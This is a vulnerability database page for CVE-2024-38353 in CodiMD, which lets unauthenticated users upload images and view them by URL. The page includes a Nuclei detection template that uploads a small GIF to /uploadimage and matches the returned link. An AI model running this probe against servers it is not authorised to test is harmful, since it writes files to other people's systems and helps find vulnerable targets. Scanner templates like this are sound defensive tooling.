| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2024-38353 | 10 Jul 202422:39 | – | circl | |
| CodiMD Security Vulnerabilities | 10 Jul 202400:00 | – | cnnvd | |
| CVE-2024-38353 | 10 Jul 202419:50 | – | cve | |
| CVE-2024-38353 CodiMD - Missing Image Access Controls and Unauthorized Image Access | 10 Jul 202419:50 | – | cvelist | |
| EUVD-2024-37276 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-38353 | 10 Jul 202420:15 | – | nvd | |
| CVE-2024-38353 CodiMD - Missing Image Access Controls and Unauthorized Image Access | 10 Jul 202419:50 | – | osv | |
| CVE-2024-38353 CodiMD - Missing Image Access Controls and Unauthorized Image Access | 10 Jul 202419:50 | – | vulnrichment |
id: CVE-2024-38353
info:
name: CodiMD <2.5.4 - Insecure Filename Randomization
author: denandz,PulseSecurity.co.nz
severity: medium
description: |
CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data. Due to the insecure random filename generation in the underlying Formidable library, an attacker can determine the filenames for previously uploaded images and the likelihood of this issue being exploited is increased.
impact: |
An attacker can gain unauthorised access to images uploaded to CodiMD.
remediation: |
Update CodiMD to version 2.5.4 or later
reference:
- https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
- https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
- https://nvd.nist.gov/vuln/detail/CVE-2024-38353
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-38353
cwe-id: CWE-338
epss-score: 0.01158
epss-percentile: 0.63255
metadata:
verified: true
max-request: 1
shodan-query: html:"CodiMD"
tags: cve,cve2024,file-upload,intrusive,codimd,vuln
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /uploadimage HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="image"; filename="{{filename}}.gif"
Content-Type: image/gif
{{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
-----------------------------92633278134516118923780781161--
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"link":"/uploads/[a-z0-9]{25,25}.gif"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"link":"(/uploads/[a-z0-9]{25,25}.gif)"'
# digest: 4a0a00473045022027f2bb278bea7f62f5c7f2ffdfcd638abd25cc536adb4c87ea5ebffda3289a1f0221008f7da1701c57b866dab23ffb3a550d29df559cda5e149cd656bfa0f895b5e770:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation